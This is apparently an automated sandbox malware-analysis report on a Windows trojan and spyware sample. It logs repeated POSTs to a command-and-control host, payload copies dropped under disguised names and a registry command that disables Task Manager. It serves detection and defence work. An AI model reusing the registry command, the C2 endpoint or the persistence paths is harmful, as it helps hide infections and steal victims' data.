                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1784Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1796Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global traffic | HTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 891781cm.renyash.ru | Content-Length: 1064 | Expect: 100-continue | Connection: Keep-Alive
                                    Source: global traffic | HTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 891781cm.renyash.ru | Content-Length: 1772 | Expect: 100-continue | Connection: Keep-Alive
                                    Source: global traffic | HTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 891781cm.renyash.ru | Content-Length: 1060 | Expect: 100-continue | Connection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1796Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1064Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1796Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1064Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1796Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1072Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1064Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1064Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1772Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 891781cm.renyash.ruContent-Length: 1060Expect: 100-continue
                                    Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global traffic DNS traffic detected: DNS query: 891781cm.renyash.ru
                                    Source: unknown HTTP traffic detected: POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 891781cm.renyash.ru Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp, aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.0000000003190000.00000004.00000800.00020000.00000000.sdmp, aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.0000000002B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://891781cm.renyash.ru
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://891781cm.renyash.ru/
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.0000000003008000.00000004.00000800.00020000.00000000.sdmp, aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.00000000031DE000.00000004.00000800.00020000.00000000.sdmp, aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://891781cm.renyash.ru/ProcessorServerdefaultsqltrafficuniversalwpprivate.php
                                    Source: Agentcomponentbrokermonitordhcp.exe, 00000005.00000002.1742549367.000000000313E000.00000004.00000800.00020000.00000000.sdmp, aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4141584721.0000000002BF7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico https://www.ecosia.org/search?q=
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.ico https://ch.search.yahoo.com/search
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.dr String found in binary or memory: https://duckduckgo.com/favicon.ico https://duckduckgo.com/?q=
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.dr String found in binary or memory: https://www.ecosia.org/newtab/
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4157571732.0000000012C8D000.00000004.00000800.00020000.00000000.sdmp, GOdToCbXiF.31.dr, vfrpdsrKpp.31.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe Window created: window name: CLIPBRDWNDCLASS

                                    System Summary

                                    Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exe Code function: 0_2_00586FAA: __EH_prolog, _wcslen, _wcslen, CreateFileW, CloseHandle, CreateDirectoryW, CreateFileW, DeviceIoControl, CloseHandle, GetLastError, RemoveDirectoryW, DeleteFileW
                                    Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe FA545F3F6FA282DBE529483BB3FAC3DAE0EA6C466A7BCB0BB7F843622BEC7177
                                    Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe FA545F3F6FA282DBE529483BB3FAC3DAE0EA6C466A7BCB0BB7F843622BEC7177
                                    Source: Joe Sandbox View Dropped File: C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exe FA545F3F6FA282DBE529483BB3FAC3DAE0EA6C466A7BCB0BB7F843622BEC7177
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exe Code function: String function: 0059F5F0 appears 31 times
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exe Code function: String function: 0059EC50 appears 56 times
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exe Code function: String function: 0059EB78 appears 39 times
                                    Source: GoOOBNnj.log.5.dr Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: 1znAXdPcM5.exe Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs 1znAXdPcM5.exe
                                    Source: 1znAXdPcM5.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                    Source: Agentcomponentbrokermonitordhcp.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: RuntimeBroker.exe.5.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe.5.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe0.5.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe1.5.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@41/38@1/1
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exe Code function: 0_2_00586C74 GetLastError, FormatMessageW
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exe Code function: 0_2_0059A6C2 FindResourceW, SizeofResource, LoadResource, LockResource, GlobalAlloc, GlobalLock, CreateStreamOnHGlobal, GdipCreateHBITMAPFromBitmap, GlobalUnlock, GlobalFree
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe File created: C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exe File created: C:\Users\user\AppData\Roaming\Local
                                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe Mutant created: NULL
                                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5460:120:WilError_03
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-4vN0EXGexU6B21K1d7FI
                                    Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\ELi4IhX1eHmQ2UsaOienYgDzI4HKnyNJ9ZRwGYArPHIQTcsLe.bat" "
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exe Command line argument: sfxname 0_2_0059DF1E
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exe Command line argument: sfxstime 0_2_0059DF1E
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exe Command line argument: STARTDLG 0_2_0059DF1E
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exe Command line argument: xz] 0_2_0059DF1E
                                    Source: 1znAXdPcM5.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: 1znAXdPcM5.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\1znAXdPcM5.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\1znAXdPcM5.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 4aWztmXmFN.31.dr, s64qcwfi16.31.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: aXnWbWpBWYJmkhPMHrrUNM.exe, 0000001F.00000002.4167570686.000000001C750000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera').0\;C:\W
Source: 1znAXdPcM5.exe | Virustotal: Detection: 49%
Source: 1znAXdPcM5.exe | ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\1znAXdPcM5.exe | File read: C:\Users\user\Desktop\1znAXdPcM5.exe
